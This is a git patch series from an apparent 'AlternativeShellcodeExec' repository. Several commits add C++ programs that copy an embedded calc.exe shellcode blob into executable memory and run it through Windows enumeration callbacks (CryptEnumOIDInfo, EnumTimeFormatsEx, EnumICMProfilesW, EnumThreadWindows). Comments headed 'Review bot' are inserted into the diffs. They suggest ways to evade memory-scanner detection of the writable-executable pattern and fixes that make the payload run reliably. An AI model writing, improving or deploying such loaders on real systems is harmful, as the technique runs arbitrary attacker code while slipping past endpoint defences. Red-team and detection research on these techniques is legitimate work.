@@ -401,6 +403,14 @@ Global {D3788A6D-E9D8-44FF-B368-B42BC341C8F5}.Release|x64.Build.0 = Release|x64 {D3788A6D-E9D8-44FF-B368-B42BC341C8F5}.Release|x86.ActiveCfg = Release|Win32 {D3788A6D-E9D8-44FF-B368-B42BC341C8F5}.Release|x86.Build.0 = Release|Win32 + {D21641FB-1935-4ED9-B511-BC80F00B733F}.Debug|x64.ActiveCfg = Debug|x64 + {D21641FB-1935-4ED9-B511-BC80F00B733F}.Debug|x64.Build.0 = Debug|x64 + {D21641FB-1935-4ED9-B511-BC80F00B733F}.Debug|x86.ActiveCfg = Debug|Win32 + {D21641FB-1935-4ED9-B511-BC80F00B733F}.Debug|x86.Build.0 = Debug|Win32 + {D21641FB-1935-4ED9-B511-BC80F00B733F}.Release|x64.ActiveCfg = Release|x64 + {D21641FB-1935-4ED9-B511-BC80F00B733F}.Release|x64.Build.0 = Release|x64 + {D21641FB-1935-4ED9-B511-BC80F00B733F}.Release|x86.ActiveCfg = Release|Win32 + {D21641FB-1935-4ED9-B511-BC80F00B733F}.Release|x86.Build.0 = Release|Win32 EndGlobalSection GlobalSection(SolutionProperties) = preSolution HideSolutionNode = FALSE diff --git a/CryptEnumOIDInfo/CryptEnumOIDInfo.cpp b/CryptEnumOIDInfo/CryptEnumOIDInfo.cpp new file mode 100644 index 0000000..6ed4b53 --- /dev/null +++ b/CryptEnumOIDInfo/CryptEnumOIDInfo.cpp 
@@ -0,0 +1,44 @@
+#include
+#include
+#include
+
+#pragma comment(lib, "Crypt32.lib")
+
+// alfarom256 calc shellcode
+unsigned char op[] =
+"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
+"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
+"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
+"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
+"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
+"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
+"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
+"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
+"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
+"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
+"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
+"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
+"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
+"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
+"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
+"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
+"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
+"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
+"\x63\x2e\x65\x78\x65\x00";
+
+
+
+
+int main() {
+
+
+ LPVOID address = VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+ memcpy(address, &op[0], sizeof(op));
+
+
+ CryptEnumOIDInfo(NULL, NULL, NULL, (PFN_CRYPT_ENUM_OID_INFO)address);
+
+
+ return 0;
+
+}
\ No newline at end of file
diff --git a/CryptEnumOIDInfo/CryptEnumOIDInfo.vcxproj b/CryptEnumOIDInfo/CryptEnumOIDInfo.vcxproj
new file mode 100644
index 0000000..25f5b4b
--- /dev/null
+++ b/CryptEnumOIDInfo/CryptEnumOIDInfo.vcxproj
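Review bot: The payload is copied into and executed from one `PAGE_EXECUTE_READWRITE` region, which is the W+X pattern that memory scanners and callback-pointer checks key on and is unnecessary for a callback that is only read after the copy; allocate with `PAGE_READWRITE`, copy, then switch with `DWORD old; if (!VirtualProtect(address, sizeof(op), PAGE_EXECUTE_READ, &old)) return 1;` before handing the pointer to `CryptEnumOIDInfo`. The `VirtualAlloc` result is also unchecked, so a failed allocation turns the `memcpy` into a write to address 0; add `if (!address) return 1;`. The first two `CryptEnumOIDInfo` parameters are `DWORD`s, so passing `0` rather than `NULL` for them documents that "all groups, no flags" is intended rather than a pointer.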
@@ -0,0 +1,147 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 16.0 + Win32Proj + {d21641fb-1935-4ed9-b511-bc80f00b733f} + CryptEnumOIDInfo + 10.0 + + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + + + false + + + true + + + false + + + + Level3 + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + \ No newline at end of file diff --git a/CryptEnumOIDInfo/CryptEnumOIDInfo.vcxproj.filters b/CryptEnumOIDInfo/CryptEnumOIDInfo.vcxproj.filters new file mode 100644 index 0000000..5123c51 --- /dev/null +++ b/CryptEnumOIDInfo/CryptEnumOIDInfo.vcxproj.filters @@ -0,0 +1,22 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + Source Files + + + \ No newline at end of file From 8b979a421a0b51e9a6360f025e69b387bab64b69 Mon Sep 17 00:00:00 2001 
From: S4R1N Date: Fri, 7 May 2021 22:56:40 -0400 Subject: [PATCH 24/28] Anotha one --- AlternativeShellcodeExec.sln | 10 ++ EnumTimeFormatsEx/EnumTimeFormatsEx.cpp | 42 +++++ EnumTimeFormatsEx/EnumTimeFormatsEx.vcxproj | 147 ++++++++++++++++++ .../EnumTimeFormatsEx.vcxproj.filters | 22 +++ 4 files changed, 221 insertions(+) create mode 100644 EnumTimeFormatsEx/EnumTimeFormatsEx.cpp create mode 100644 EnumTimeFormatsEx/EnumTimeFormatsEx.vcxproj create mode 100644 EnumTimeFormatsEx/EnumTimeFormatsEx.vcxproj.filters diff --git a/AlternativeShellcodeExec.sln b/AlternativeShellcodeExec.sln index 1614824..bd08621 100644 --- a/AlternativeShellcodeExec.sln +++ b/AlternativeShellcodeExec.sln @@ -83,6 +83,8 @@ Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumObjects", "EnumObjects\ EndProject Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CryptEnumOIDInfo", "CryptEnumOIDInfo\CryptEnumOIDInfo.vcxproj", "{D21641FB-1935-4ED9-B511-BC80F00B733F}" EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumTimeFormatsEx", "EnumTimeFormatsEx\EnumTimeFormatsEx.vcxproj", "{5007CFB3-4072-4B23-9FF9-BDE0B75286F1}" +EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution Debug|x64 = Debug|x64 
@@ -411,6 +413,14 @@ Global {D21641FB-1935-4ED9-B511-BC80F00B733F}.Release|x64.Build.0 = Release|x64 {D21641FB-1935-4ED9-B511-BC80F00B733F}.Release|x86.ActiveCfg = Release|Win32 {D21641FB-1935-4ED9-B511-BC80F00B733F}.Release|x86.Build.0 = Release|Win32 + {5007CFB3-4072-4B23-9FF9-BDE0B75286F1}.Debug|x64.ActiveCfg = Debug|x64 + {5007CFB3-4072-4B23-9FF9-BDE0B75286F1}.Debug|x64.Build.0 = Debug|x64 + {5007CFB3-4072-4B23-9FF9-BDE0B75286F1}.Debug|x86.ActiveCfg = Debug|Win32 + {5007CFB3-4072-4B23-9FF9-BDE0B75286F1}.Debug|x86.Build.0 = Debug|Win32 + {5007CFB3-4072-4B23-9FF9-BDE0B75286F1}.Release|x64.ActiveCfg = Release|x64 + {5007CFB3-4072-4B23-9FF9-BDE0B75286F1}.Release|x64.Build.0 = Release|x64 + {5007CFB3-4072-4B23-9FF9-BDE0B75286F1}.Release|x86.ActiveCfg = Release|Win32 + {5007CFB3-4072-4B23-9FF9-BDE0B75286F1}.Release|x86.Build.0 = Release|Win32 EndGlobalSection GlobalSection(SolutionProperties) = preSolution HideSolutionNode = FALSE diff --git a/EnumTimeFormatsEx/EnumTimeFormatsEx.cpp b/EnumTimeFormatsEx/EnumTimeFormatsEx.cpp new file mode 100644 index 0000000..86f70c6 --- /dev/null +++ b/EnumTimeFormatsEx/EnumTimeFormatsEx.cpp 
@@ -0,0 +1,42 @@
+#include
+#include
+#include
+
+#pragma comment(lib, "Crypt32.lib")
+
+// alfarom256 calc shellcode
+unsigned char op[] =
+"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
+"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
+"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
+"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
+"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
+"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
+"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
+"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
+"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
+"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
+"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
+"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
+"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
+"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
+"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
+"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
+"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
+"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
+"\x63\x2e\x65\x78\x65\x00";
+
+
+
+
+int main() {
+
+
+ LPVOID address = VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+ memcpy(address, &op[0], sizeof(op));
+
+ EnumTimeFormatsEx((TIMEFMT_ENUMPROCEX)address, LOCALE_NAME_SYSTEM_DEFAULT, TIME_NOSECONDS, NULL);
+
+ return 0;
+
+}
\ No newline at end of file
diff --git a/EnumTimeFormatsEx/EnumTimeFormatsEx.vcxproj b/EnumTimeFormatsEx/EnumTimeFormatsEx.vcxproj
new file mode 100644
index 0000000..bd75cd0
--- /dev/null
+++ b/EnumTimeFormatsEx/EnumTimeFormatsEx.vcxproj
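Review bot: `#pragma comment(lib, "Crypt32.lib")` is carried over from the CryptEnumOIDInfo variant, but nothing in this file references crypt32 — `EnumTimeFormatsEx` is a kernel32 export — so the directive is dead and misleads a reader about the binary's dependencies; remove it. `VirtualAlloc` is again unchecked before `memcpy`, so add `if (!address) return 1;` after the allocation. A one-line comment at the call site, e.g. `// shellcode runs as the TIMEFMT_ENUMPROCEX callback, once per time format of the system locale`, would make the technique obvious without reading the callback typedef.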
@@ -0,0 +1,147 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 16.0 + Win32Proj + {5007cfb3-4072-4b23-9ff9-bde0b75286f1} + EnumTimeFormatsEx + 10.0 + + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + + + false + + + true + + + false + + + + Level3 + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + \ No newline at end of file diff --git a/EnumTimeFormatsEx/EnumTimeFormatsEx.vcxproj.filters b/EnumTimeFormatsEx/EnumTimeFormatsEx.vcxproj.filters new file mode 100644 index 0000000..10beb25 --- /dev/null +++ b/EnumTimeFormatsEx/EnumTimeFormatsEx.vcxproj.filters @@ -0,0 +1,22 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + Source Files + + + \ No newline at end of file From 407afd0e5f4a8654463e3e0bcbf81e3b8cadd8ee Mon Sep 17 00:00:00 2001 
From: S4R1N Date: Sat, 12 Jun 2021 22:37:01 -0400 Subject: [PATCH 25/28] MEH --- AlternativeShellcodeExec.sln | 10 ++ EnumICMProfiles/EnumICMProfiles.cpp | 39 +++++ EnumICMProfiles/EnumICMProfiles.vcxproj | 147 ++++++++++++++++++ .../EnumICMProfiles.vcxproj.filters | 22 +++ 4 files changed, 218 insertions(+) create mode 100644 EnumICMProfiles/EnumICMProfiles.cpp create mode 100644 EnumICMProfiles/EnumICMProfiles.vcxproj create mode 100644 EnumICMProfiles/EnumICMProfiles.vcxproj.filters diff --git a/AlternativeShellcodeExec.sln b/AlternativeShellcodeExec.sln index bd08621..dcae178 100644 --- a/AlternativeShellcodeExec.sln +++ b/AlternativeShellcodeExec.sln @@ -85,6 +85,8 @@ Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CryptEnumOIDInfo", "CryptEn EndProject Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumTimeFormatsEx", "EnumTimeFormatsEx\EnumTimeFormatsEx.vcxproj", "{5007CFB3-4072-4B23-9FF9-BDE0B75286F1}" EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumICMProfiles", "EnumICMProfiles\EnumICMProfiles.vcxproj", "{179D883D-4DC3-4EDB-848B-3FE8C3C5554C}" +EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution Debug|x64 = Debug|x64 
@@ -421,6 +423,14 @@ Global {5007CFB3-4072-4B23-9FF9-BDE0B75286F1}.Release|x64.Build.0 = Release|x64 {5007CFB3-4072-4B23-9FF9-BDE0B75286F1}.Release|x86.ActiveCfg = Release|Win32 {5007CFB3-4072-4B23-9FF9-BDE0B75286F1}.Release|x86.Build.0 = Release|Win32 + {179D883D-4DC3-4EDB-848B-3FE8C3C5554C}.Debug|x64.ActiveCfg = Debug|x64 + {179D883D-4DC3-4EDB-848B-3FE8C3C5554C}.Debug|x64.Build.0 = Debug|x64 + {179D883D-4DC3-4EDB-848B-3FE8C3C5554C}.Debug|x86.ActiveCfg = Debug|Win32 + {179D883D-4DC3-4EDB-848B-3FE8C3C5554C}.Debug|x86.Build.0 = Debug|Win32 + {179D883D-4DC3-4EDB-848B-3FE8C3C5554C}.Release|x64.ActiveCfg = Release|x64 + {179D883D-4DC3-4EDB-848B-3FE8C3C5554C}.Release|x64.Build.0 = Release|x64 + {179D883D-4DC3-4EDB-848B-3FE8C3C5554C}.Release|x86.ActiveCfg = Release|Win32 + {179D883D-4DC3-4EDB-848B-3FE8C3C5554C}.Release|x86.Build.0 = Release|Win32 EndGlobalSection GlobalSection(SolutionProperties) = preSolution HideSolutionNode = FALSE diff --git a/EnumICMProfiles/EnumICMProfiles.cpp b/EnumICMProfiles/EnumICMProfiles.cpp new file mode 100644 index 0000000..6fcfb70 --- /dev/null +++ b/EnumICMProfiles/EnumICMProfiles.cpp 
@@ -0,0 +1,39 @@
+// EnumICMProfiles.cpp : This file contains the 'main' function. Program execution begins and ends there.
+//
+
+#include
+
+unsigned char op[] =
+"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
+"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
+"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
+"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
+"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
+"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
+"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
+"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
+"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
+"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
+"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
+"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
+"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
+"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
+"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
+"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
+"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
+"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
+"\x63\x2e\x65\x78\x65\x00";
+
+
+
+int main() {
+
+
+ LPVOID addr = VirtualAlloc(NULL, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+ ::RtlMoveMemory(addr, op, sizeof(op));
+
+ HDC dummy = GetDC(NULL);
+ EnumICMProfilesW(dummy, (ICMENUMPROCW)addr, NULL);
+
+}
+
diff --git a/EnumICMProfiles/EnumICMProfiles.vcxproj b/EnumICMProfiles/EnumICMProfiles.vcxproj
new file mode 100644
index 0000000..dad3b55
--- /dev/null
+++ b/EnumICMProfiles/EnumICMProfiles.vcxproj
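Review bot: `VirtualAlloc` is unchecked before `::RtlMoveMemory`, so a failed allocation becomes a write to address 0; add `if (!addr) return 1;` after it. `HDC dummy = GetDC(NULL)` is never released and `main` has no `return`, unlike the sibling projects in this series; `ReleaseDC(NULL, dummy); return 0;` after the enumeration keeps the PoCs uniform even if the payload exits the process first, which its trailing exit-function selection suggests but I have not traced. This file also allocates with `MEM_COMMIT` alone while the earlier variants use `MEM_RESERVE | MEM_COMMIT` — both are valid with a `NULL` base address, so a short comment on the choice, or aligning with the others, avoids a reader assuming a difference. The Visual Studio template banner at the top says nothing about the file; replace it with one line naming the technique, e.g. `// Shellcode execution via the EnumICMProfilesW enumeration callback.`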
@@ -0,0 +1,147 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 16.0 + Win32Proj + {179d883d-4dc3-4edb-848b-3fe8c3c5554c} + EnumICMProfiles + 10.0 + + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + + + false + + + true + + + false + + + + Level3 + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + \ No newline at end of file diff --git a/EnumICMProfiles/EnumICMProfiles.vcxproj.filters b/EnumICMProfiles/EnumICMProfiles.vcxproj.filters new file mode 100644 index 0000000..e82fbb0 --- /dev/null +++ b/EnumICMProfiles/EnumICMProfiles.vcxproj.filters @@ -0,0 +1,22 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + Source Files + + + \ No newline at end of file From 4a4d8461585e0a3bbab07a1580efb2dd319baa77 Mon Sep 17 00:00:00 2001 
From: S4R1N Date: Sun, 5 Dec 2021 19:45:36 -0500 Subject: [PATCH 26/28] i guess im working on this again.... --- AlternativeShellcodeExec.sln | 10 ++ EnumThreadWindows/EnumThreadWindows.cpp | 37 +++++ EnumThreadWindows/EnumThreadWindows.vcxproj | 147 ++++++++++++++++++ .../EnumThreadWindows.vcxproj.filters | 22 +++ 4 files changed, 216 insertions(+) create mode 100644 EnumThreadWindows/EnumThreadWindows.cpp create mode 100644 EnumThreadWindows/EnumThreadWindows.vcxproj create mode 100644 EnumThreadWindows/EnumThreadWindows.vcxproj.filters diff --git a/AlternativeShellcodeExec.sln b/AlternativeShellcodeExec.sln index dcae178..84b41c7 100644 --- a/AlternativeShellcodeExec.sln +++ b/AlternativeShellcodeExec.sln @@ -87,6 +87,8 @@ Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumTimeFormatsEx", "EnumTi EndProject Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumICMProfiles", "EnumICMProfiles\EnumICMProfiles.vcxproj", "{179D883D-4DC3-4EDB-848B-3FE8C3C5554C}" EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumThreadWindows", "EnumThreadWindows\EnumThreadWindows.vcxproj", "{4DC52185-7351-4EFA-A364-65945302F470}" +EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution Debug|x64 = Debug|x64 
@@ -431,6 +433,14 @@ Global {179D883D-4DC3-4EDB-848B-3FE8C3C5554C}.Release|x64.Build.0 = Release|x64 {179D883D-4DC3-4EDB-848B-3FE8C3C5554C}.Release|x86.ActiveCfg = Release|Win32 {179D883D-4DC3-4EDB-848B-3FE8C3C5554C}.Release|x86.Build.0 = Release|Win32 + {4DC52185-7351-4EFA-A364-65945302F470}.Debug|x64.ActiveCfg = Debug|x64 + {4DC52185-7351-4EFA-A364-65945302F470}.Debug|x64.Build.0 = Debug|x64 + {4DC52185-7351-4EFA-A364-65945302F470}.Debug|x86.ActiveCfg = Debug|Win32 + {4DC52185-7351-4EFA-A364-65945302F470}.Debug|x86.Build.0 = Debug|Win32 + {4DC52185-7351-4EFA-A364-65945302F470}.Release|x64.ActiveCfg = Release|x64 + {4DC52185-7351-4EFA-A364-65945302F470}.Release|x64.Build.0 = Release|x64 + {4DC52185-7351-4EFA-A364-65945302F470}.Release|x86.ActiveCfg = Release|Win32 + {4DC52185-7351-4EFA-A364-65945302F470}.Release|x86.Build.0 = Release|Win32 EndGlobalSection GlobalSection(SolutionProperties) = preSolution HideSolutionNode = FALSE diff --git a/EnumThreadWindows/EnumThreadWindows.cpp b/EnumThreadWindows/EnumThreadWindows.cpp new file mode 100644 index 0000000..7fa46ad --- /dev/null +++ b/EnumThreadWindows/EnumThreadWindows.cpp 
@@ -0,0 +1,37 @@
+#include
+
+
+// alfarom256 calc shellcode
+unsigned char op[] =
+"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
+"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
+"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
+"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
+"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
+"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
+"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
+"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
+"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
+"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
+"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
+"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
+"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
+"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
+"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
+"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
+"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
+"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
+"\x63\x2e\x65\x78\x65\x00";
+
+
+
+int main() {
+
+
+ LPVOID addr = ::VirtualAlloc(NULL, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+ ::RtlMoveMemory(addr, op, sizeof(op));
+ EnumThreadWindows(0, (WNDENUMPROC)addr, NULL);
+
+ return 0;
+
+}
\ No newline at end of file
diff --git a/EnumThreadWindows/EnumThreadWindows.vcxproj b/EnumThreadWindows/EnumThreadWindows.vcxproj
new file mode 100644
index 0000000..bc340f5
--- /dev/null
+++ b/EnumThreadWindows/EnumThreadWindows.vcxproj
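Review bot: `EnumThreadWindows(0, ...)` depends on a thread id of `0`, which the documented contract does not define — a console thread owns no windows of its own, so whether the callback fires at all rests on undocumented user32 behaviour (it appears to fall back to walking top-level windows, but that should be confirmed on target builds rather than assumed). Add a comment at the call site such as `// thread id 0 is undocumented; relied upon to reach the callback from a window-less console thread — verify per OS build`, and treat a `FALSE`/zero-callback run as "payload never executed" rather than as an API failure. `::VirtualAlloc` is unchecked before `::RtlMoveMemory`; add `if (!addr) return 1;` after the allocation.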
@@ -0,0 +1,147 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 16.0 + Win32Proj + {4dc52185-7351-4efa-a364-65945302f470} + EnumThreadWindows + 10.0 + + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + + + false + + + true + + + false + + + + Level3 + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + 